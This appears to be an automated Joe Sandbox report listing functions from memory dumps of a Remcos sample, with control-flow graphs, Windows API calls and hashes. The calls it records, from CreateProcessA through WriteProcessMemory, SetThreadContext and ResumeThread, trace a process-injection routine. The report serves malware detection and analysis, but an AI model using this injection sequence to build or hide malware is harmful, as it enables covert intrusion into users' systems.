                                              • GetCurrentProcess.KERNEL32 ref: 015AD01E
                                              • GetCurrentThread.KERNEL32 ref: 015AD05B
                                              • GetCurrentProcess.KERNEL32 ref: 015AD098
                                              • GetCurrentThreadId.KERNEL32 ref: 015AD0F1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 65b27aaed224606f8b9201d2e88cd238d63a88b932ce9cb00e72766385a0108d
                                              • Instruction ID: fb90f87682641789deac64df559d4570dfc7d9634bab45b16d9295dcd6f0cca0
                                              • Opcode Fuzzy Hash: 65b27aaed224606f8b9201d2e88cd238d63a88b932ce9cb00e72766385a0108d
                                              • Instruction Fuzzy Hash: 8F5177B09017498FEB28DFAAD548B9EBBF1FF88304F208459D409AB360D7749944CF66
                                              Function 074C7AC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 74c7ac0-74c7b55 46 74c7b8e-74c7bae 44->46 47 74c7b57-74c7b61 44->47 52 74c7be7-74c7c16 46->52 53 74c7bb0-74c7bba 46->53 47->46 48 74c7b63-74c7b65 47->48 50 74c7b88-74c7b8b 48->50 51 74c7b67-74c7b71 48->51 50->46 54 74c7b75-74c7b84 51->54 55 74c7b73 51->55 63 74c7c4f-74c7d09 CreateProcessA 52->63 64 74c7c18-74c7c22 52->64 53->52 56 74c7bbc-74c7bbe 53->56 54->54 57 74c7b86 54->57 55->54 58 74c7bc0-74c7bca 56->58 59 74c7be1-74c7be4 56->59 57->50 61 74c7bcc 58->61 62 74c7bce-74c7bdd 58->62 59->52 61->62 62->62 65 74c7bdf 62->65 75 74c7d0b-74c7d11 63->75 76 74c7d12-74c7d98 63->76 64->63 66 74c7c24-74c7c26 64->66 65->59 68 74c7c28-74c7c32 66->68 69 74c7c49-74c7c4c 66->69 70 74c7c34 68->70 71 74c7c36-74c7c45 68->71 69->63 70->71 71->71 72 74c7c47 71->72 72->69 75->76 86 74c7da8-74c7dac 76->86 87 74c7d9a-74c7d9e 76->87 89 74c7dbc-74c7dc0 86->89 90 74c7dae-74c7db2 86->90 87->86 88 74c7da0 87->88 88->86 92 74c7dd0-74c7dd4 89->92 93 74c7dc2-74c7dc6 89->93 90->89 91 74c7db4 90->91 91->89 95 74c7de6-74c7ded 92->95 96 74c7dd6-74c7ddc 92->96 93->92 94 74c7dc8 93->94 94->92 97 74c7def-74c7dfe 95->97 98 74c7e04 95->98 96->95 97->98 100 74c7e05 98->100 100->100
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074C7CF6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 4525b2da250811a94d36ae8709e9b14ba4a51b71140c0e190ffdf822efef4357
                                              • Instruction ID: f4cda6cdc80c67e97c606731459556c8185a293c5f9609dba323c4059e9e93c7
                                              • Opcode Fuzzy Hash: 4525b2da250811a94d36ae8709e9b14ba4a51b71140c0e190ffdf822efef4357
                                              • Instruction Fuzzy Hash: A0916CB5D0031ACFEB65CF68C841BEEBBB2BF44314F14856AE819A7240DB749985CF91
                                              Function 074C7ABF Relevance: 1.7, APIs: 1, Instructions: 241processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 101 74c7abf-74c7b55 103 74c7b8e-74c7bae 101->103 104 74c7b57-74c7b61 101->104 109 74c7be7-74c7c16 103->109 110 74c7bb0-74c7bba 103->110 104->103 105 74c7b63-74c7b65 104->105 107 74c7b88-74c7b8b 105->107 108 74c7b67-74c7b71 105->108 107->103 111 74c7b75-74c7b84 108->111 112 74c7b73 108->112 120 74c7c4f-74c7d09 CreateProcessA 109->120 121 74c7c18-74c7c22 109->121 110->109 113 74c7bbc-74c7bbe 110->113 111->111 114 74c7b86 111->114 112->111 115 74c7bc0-74c7bca 113->115 116 74c7be1-74c7be4 113->116 114->107 118 74c7bcc 115->118 119 74c7bce-74c7bdd 115->119 116->109 118->119 119->119 122 74c7bdf 119->122 132 74c7d0b-74c7d11 120->132 133 74c7d12-74c7d98 120->133 121->120 123 74c7c24-74c7c26 121->123 122->116 125 74c7c28-74c7c32 123->125 126 74c7c49-74c7c4c 123->126 127 74c7c34 125->127 128 74c7c36-74c7c45 125->128 126->120 127->128 128->128 129 74c7c47 128->129 129->126 132->133 143 74c7da8-74c7dac 133->143 144 74c7d9a-74c7d9e 133->144 146 74c7dbc-74c7dc0 143->146 147 74c7dae-74c7db2 143->147 144->143 145 74c7da0 144->145 145->143 149 74c7dd0-74c7dd4 146->149 150 74c7dc2-74c7dc6 146->150 147->146 148 74c7db4 147->148 148->146 152 74c7de6-74c7ded 149->152 153 74c7dd6-74c7ddc 149->153 150->149 151 74c7dc8 150->151 151->149 154 74c7def-74c7dfe 152->154 155 74c7e04 152->155 153->152 154->155 157 74c7e05 155->157 157->157
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074C7CF6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: d1521bf0c3d915d1b875fcd704abf47a399fc8dbfd8fb9766d8afe043bced41f
                                              • Instruction ID: ae585fe625545be1f5efb12b125fd55f89966b456c88e92a84e121b50323f9fe
                                              • Opcode Fuzzy Hash: d1521bf0c3d915d1b875fcd704abf47a399fc8dbfd8fb9766d8afe043bced41f
                                              • Instruction Fuzzy Hash: 6D916CB5D0031ACFEB65CF68C8417EEBBB2BF44314F14856AE819A7240DB749985CF91
                                              Function 015AAD08 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 158 15aad08-15aad17 159 15aad19-15aad26 call 15aa02c 158->159 160 15aad43-15aad47 158->160 165 15aad28 159->165 166 15aad3c 159->166 162 15aad5b-15aad9c 160->162 163 15aad49-15aad53 160->163 169 15aada9-15aadb7 162->169 170 15aad9e-15aada6 162->170 163->162 215 15aad2e call 15aaf90 165->215 216 15aad2e call 15aafa0 165->216 166->160 171 15aaddb-15aaddd 169->171 172 15aadb9-15aadbe 169->172 170->169 177 15aade0-15aade7 171->177 174 15aadc9 172->174 175 15aadc0-15aadc7 call 15aa038 172->175 173 15aad34-15aad36 173->166 176 15aae78-15aaef4 173->176 179 15aadcb-15aadd9 174->179 175->179 208 15aaf20-15aaf38 176->208 209 15aaef6-15aaf1e 176->209 180 15aade9-15aadf1 177->180 181 15aadf4-15aadfb 177->181 179->177 180->181 183 15aae08-15aae11 call 15aa048 181->183 184 15aadfd-15aae05 181->184 189 15aae1e-15aae23 183->189 190 15aae13-15aae1b 183->190 184->183 191 15aae41-15aae45 189->191 192 15aae25-15aae2c 189->192 190->189 217 15aae48 call 15ab270 191->217 218 15aae48 call 15ab2a0 191->218 192->191 194 15aae2e-15aae3e call 15aa058 call 15aa068 192->194 194->191 197 15aae4b-15aae4e 199 15aae50-15aae6e 197->199 200 15aae71-15aae77 197->200 199->200 210 15aaf3a-15aaf3d 208->210 211 15aaf40-15aaf6b GetModuleHandleW 208->211 209->208 210->211 212 15aaf6d-15aaf73 211->212 213 15aaf74-15aaf88 211->213 212->213 215->173 216->173 217->197 218->197
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015AAF5E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f652181ac0b4e90936dc3f05a7efd7aac27135a350aabdd0f79c2a60173d2677
                                              • Instruction ID: 1388292a47adf30635faa17051fc7fe2dca22b6cd5a490cc0533acee87b45eba
                                              • Opcode Fuzzy Hash: f652181ac0b4e90936dc3f05a7efd7aac27135a350aabdd0f79c2a60173d2677
                                              • Instruction Fuzzy Hash: FA814570A00B068FEB65DF29D04075EBBF1FF88204F108A2DD59A9BA50E775E849CB90
                                              Function 015A58EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 219 15a58ec-15a58f6 220 15a58f8-15a59b9 CreateActCtxA 219->220 222 15a59bb-15a59c1 220->222 223 15a59c2-15a5a1c 220->223 222->223 230 15a5a2b-15a5a2f 223->230 231 15a5a1e-15a5a21 223->231 232 15a5a40 230->232 233 15a5a31-15a5a3d 230->233 231->230 234 15a5a41 232->234 233->232 234->234
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 015A59A9
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 68e8d323caeedb379602617256351e1640d338fc17b1a68b19f862e3995e66af
                                              • Instruction ID: 189bce8618597477ace080542e46215f18b22832aab857031d4eb946d86fa664
                                              • Opcode Fuzzy Hash: 68e8d323caeedb379602617256351e1640d338fc17b1a68b19f862e3995e66af
                                              • Instruction Fuzzy Hash: 5241DF70D107198FDB24CFA9C884BCEBBB1BF49304F60806AD408AB251EBB56946CF50
                                              Function 015A44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 15a44b4-15a59b9 CreateActCtxA 239 15a59bb-15a59c1 236->239 240 15a59c2-15a5a1c 236->240 239->240 247 15a5a2b-15a5a2f 240->247 248 15a5a1e-15a5a21 240->248 249 15a5a40 247->249 250 15a5a31-15a5a3d 247->250 248->247 251 15a5a41 249->251 250->249 251->251
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 015A59A9
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 5f73032edab73bc180619ae6b3e9ed2b8643f9d9352ecde9cfdf231275843d23
                                              • Instruction ID: 1cf75656106fcb3048b67840fa9e6d6d2313bd8ec9bd0c170a72049193e787db
                                              • Opcode Fuzzy Hash: 5f73032edab73bc180619ae6b3e9ed2b8643f9d9352ecde9cfdf231275843d23
                                              • Instruction Fuzzy Hash: 3341CE70D1071D8FDB24DFA9C844B9EBBF5BF49304F60806AD408AB251DBB56945CF90
                                              Function 074C7838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 253 74c7838-74c7886 255 74c7888-74c7894 253->255 256 74c7896-74c78d5 WriteProcessMemory 253->256 255->256 258 74c78de-74c790e 256->258 259 74c78d7-74c78dd 256->259 259->258
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074C78C8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 986c75f5bf4f25bb5b40af9bf2e279b0992a2a58f3ec15161036f5cfe7b62047
                                              • Instruction ID: d5397cbdbe7b9d8755373223e1b51aefaf4bd2bd3d910dc20bea886f9ae9331f
                                              • Opcode Fuzzy Hash: 986c75f5bf4f25bb5b40af9bf2e279b0992a2a58f3ec15161036f5cfe7b62047
                                              • Instruction Fuzzy Hash: 162126B59003499FDB10CFA9C985BEEBBF5FF48310F14842AE918A7240D7789944CBA1
                                              Function 015AD5E8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 263 15ad5e8-15ad5ec 264 15ad5ee-15ad62f 263->264 265 15ad632-15ad684 DuplicateHandle 263->265 264->265 266 15ad68d-15ad6aa 265->266 267 15ad686-15ad68c 265->267 267->266
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AD677
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 290a23774319796a46f961c75297959289b95ee4dd0f615a0a833ec98c423556
                                              • Instruction ID: d8716328c032ee094cf03e9c83d4264b22dccd313a369ce6f34f0643c25388bf
                                              • Opcode Fuzzy Hash: 290a23774319796a46f961c75297959289b95ee4dd0f615a0a833ec98c423556
                                              • Instruction Fuzzy Hash: 282135B580024ADFDB11CFA9D584BDEBFF4BF08320F14855AE958A7250D378A941CF61
                                              Function 074C7837 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 74c7837-74c7886 272 74c7888-74c7894 270->272 273 74c7896-74c78d5 WriteProcessMemory 270->273 272->273 275 74c78de-74c790e 273->275 276 74c78d7-74c78dd 273->276 276->275
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074C78C8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 11e44cb6b31f7c090da38e0e5e3b72a03025c6ed1cdc43f1fec5c1b7b036b374
                                              • Instruction ID: 9407815328ed3401d2b332fc3f0b1bfe9db81b14ae0f67801dd4a49d62496002
                                              • Opcode Fuzzy Hash: 11e44cb6b31f7c090da38e0e5e3b72a03025c6ed1cdc43f1fec5c1b7b036b374
                                              • Instruction Fuzzy Hash: 832126B69003099FDB10CFA9C985BEEBBF5FF48310F14882AE518A7240D7789544CBA0
                                              Function 074C7921 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 280 74c7921-74c79b5 ReadProcessMemory 283 74c79be-74c79ee 280->283 284 74c79b7-74c79bd 280->284 284->283
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074C79A8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 079b68c4be6f780dc2a0a2cfa442fd2934545b49130fe03415f37509fb32f631
                                              • Instruction ID: 660168222c9bf8f9baa07be10cd9bf3496f223cda05a7b64d38e930e2e4d4829
                                              • Opcode Fuzzy Hash: 079b68c4be6f780dc2a0a2cfa442fd2934545b49130fe03415f37509fb32f631
                                              • Instruction Fuzzy Hash: CA2119B58003599FDB10CFA9C884BEEBBF5FF48310F14842EE559A7240D7799545CBA1
                                              Function 074C76A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 288 74c76a0-74c76eb 290 74c76ed-74c76f9 288->290 291 74c76fb-74c772b Wow64SetThreadContext 288->291 290->291 293 74c772d-74c7733 291->293 294 74c7734-74c7764 291->294 293->294
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074C771E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 1e3db147cd28917c472ea50b27a1ff584b219b5bd0d21df441cbf7f400f7fb7e
                                              • Instruction ID: 0495ec9176e04e896de264cc9fa252239ae99266177bdf9b677f8597943b1bc4
                                              • Opcode Fuzzy Hash: 1e3db147cd28917c472ea50b27a1ff584b219b5bd0d21df441cbf7f400f7fb7e
                                              • Instruction Fuzzy Hash: 3F2115B59003098FDB14DFAAC4857EEBBF4EF48224F14842ED559A7340D778A945CFA1
                                              Function 074C7928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 298 74c7928-74c79b5 ReadProcessMemory 301 74c79be-74c79ee 298->301 302 74c79b7-74c79bd 298->302 302->301
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074C79A8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 055951e5fe8d4198e8dcfb57b085bdbab085f53384e9b2bfb1a9327bc3b171a9
                                              • Instruction ID: 1066a1187fe1b07ee6f2da2864da8c66813bd846484ffd4cb5dec489650ccd96
                                              • Opcode Fuzzy Hash: 055951e5fe8d4198e8dcfb57b085bdbab085f53384e9b2bfb1a9327bc3b171a9
                                              • Instruction Fuzzy Hash: 2F2125B18003499FDB10CFAAC884BEEFBF5FF48310F14842AE958A7240D7799940CBA1
                                              Function 015AD5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 306 15ad5f0-15ad684 DuplicateHandle 307 15ad68d-15ad6aa 306->307 308 15ad686-15ad68c 306->308 308->307
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AD677
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 3b36e2aadc1ddd60b33f433043f8b40944503f9463c15b72fdf19435a24ae811
                                              • Instruction ID: d973123367ad28ae5a263af0def7d4c2fe322c3be946af070a5ecb1718dfe3e6
                                              • Opcode Fuzzy Hash: 3b36e2aadc1ddd60b33f433043f8b40944503f9463c15b72fdf19435a24ae811
                                              • Instruction Fuzzy Hash: 6621C4B59002499FDB10CF9AD584ADEBFF4FB48310F14841AE918A7750D374A954CF65
                                              Function 074C769F Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 311 74c769f-74c76eb 313 74c76ed-74c76f9 311->313 314 74c76fb-74c772b Wow64SetThreadContext 311->314 313->314 316 74c772d-74c7733 314->316 317 74c7734-74c7764 314->317 316->317
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074C771E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 5dbae8703a31f9cde1fd377dcf9db220f4bf1350441d67ee1c51f6bd3b646d17
                                              • Instruction ID: 042566c8e2575ad2d9d92e2edf5c43a01a96156dc35f18f058fb6d71daf97e6b
                                              • Opcode Fuzzy Hash: 5dbae8703a31f9cde1fd377dcf9db220f4bf1350441d67ee1c51f6bd3b646d17
                                              • Instruction Fuzzy Hash: E52124B6D003098FDB14CFAAC5857EEBBF4AF48224F14842ED559A7340D778AA45CFA1
                                              Function 074C7778 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074C77E6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 55ffdf8c3e756f98a00a8dba6a4e1020116ec0fa259ad8384608f988528aed86
                                              • Instruction ID: 2992a5e83f24a370ce7098ae938920696b69515aee74d37c379f771d705196b1
                                              • Opcode Fuzzy Hash: 55ffdf8c3e756f98a00a8dba6a4e1020116ec0fa259ad8384608f988528aed86
                                              • Instruction Fuzzy Hash: E61137768003499FDB10DFAAC845BDFBBF5EF48310F14841AE519A7250C775A540CFA1
                                              Function 074C7777 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074C77E6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 30197c67f125b9e880d39ee86cde85e1bd46b3031fecaf570f9ccceffef13c3a
                                              • Instruction ID: 5bd10557265cc8bca0cd92f83857f69f92d9a118e4627697003d1e3d02c4062c
                                              • Opcode Fuzzy Hash: 30197c67f125b9e880d39ee86cde85e1bd46b3031fecaf570f9ccceffef13c3a
                                              • Instruction Fuzzy Hash: 2E1146B6800349DFDB11DFAAC945BEEBBF5EF48310F14881AE519A7250C779A540CFA0
                                              Function 074C71B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 5ad3363d079098eb46adc690ce5b081defd2376873a62b22365c73868c19cb4c
                                              • Instruction ID: 5d3b846b536e10ec6b5b6ada67d783457c809b677f03a5bc1038a8967915de4d
                                              • Opcode Fuzzy Hash: 5ad3363d079098eb46adc690ce5b081defd2376873a62b22365c73868c19cb4c
                                              • Instruction Fuzzy Hash: 56113AB59003498FDB20DFAAC4457DEFBF5EF48214F14842AD519A7340C7796944CFA5
                                              Function 074C4460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074CB195
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: d08c13804c66e1176252fe433580559a3cb31cfc91a5609eebf1aaa49cc4dc9a
                                              • Instruction ID: 6e2c2b9d56881cb628cd848f736e803dd1d87dc81f348a4e451c24a66943da6b
                                              • Opcode Fuzzy Hash: d08c13804c66e1176252fe433580559a3cb31cfc91a5609eebf1aaa49cc4dc9a
                                              • Instruction Fuzzy Hash: 6C11C2B98003499FDB10DF9AD845BDEBBF8EB48314F10885AE558A7740D3B5A944CFA1
                                              Function 074C71B7 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 7b7ba7c8a780c0cf23a835c74dd8a92a4f519d05cae028b1a4d7437f23389020
                                              • Instruction ID: bbc2c5d6b8a9f0c235257a30cb454d894f70a6e64def1de9754c715302baf3fb
                                              • Opcode Fuzzy Hash: 7b7ba7c8a780c0cf23a835c74dd8a92a4f519d05cae028b1a4d7437f23389020
                                              • Instruction Fuzzy Hash: 1B1155B58003498BDB20CFAAC4457EEFBF4AF48214F24882AD019A7240C779A940CFA0
                                              Function 015AAEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015AAF5E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: cda5fdc6495355545405b8f8e985d3745edbf606466c0fa1298987651d7dbd2d
                                              • Instruction ID: 236462fd2aeb1dd565ddc2f736c9172276722d37305cbf1e6acca8d052b26d5b
                                              • Opcode Fuzzy Hash: cda5fdc6495355545405b8f8e985d3745edbf606466c0fa1298987651d7dbd2d
                                              • Instruction Fuzzy Hash: CB1110B5C002498FDB14CF9AC444BDEFBF8FF88214F10842AD528A7640C379A545CFA1
                                              Function 074CB130 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074CB195
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: e5e09fcfe5f10687de0f053582eea8593fbd9f7f85e39dc37f80437277141edb
                                              • Instruction ID: 0433ec905967f88a16d82e15c97206e1a1e21485a378e34c3c5d981fdcc8ff22
                                              • Opcode Fuzzy Hash: e5e09fcfe5f10687de0f053582eea8593fbd9f7f85e39dc37f80437277141edb
                                              • Instruction Fuzzy Hash: AF1100B98002499FDB10CF99D985BDEBBF8FB08324F10881AD958B3740C378A544CFA1
                                              Function 0154D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
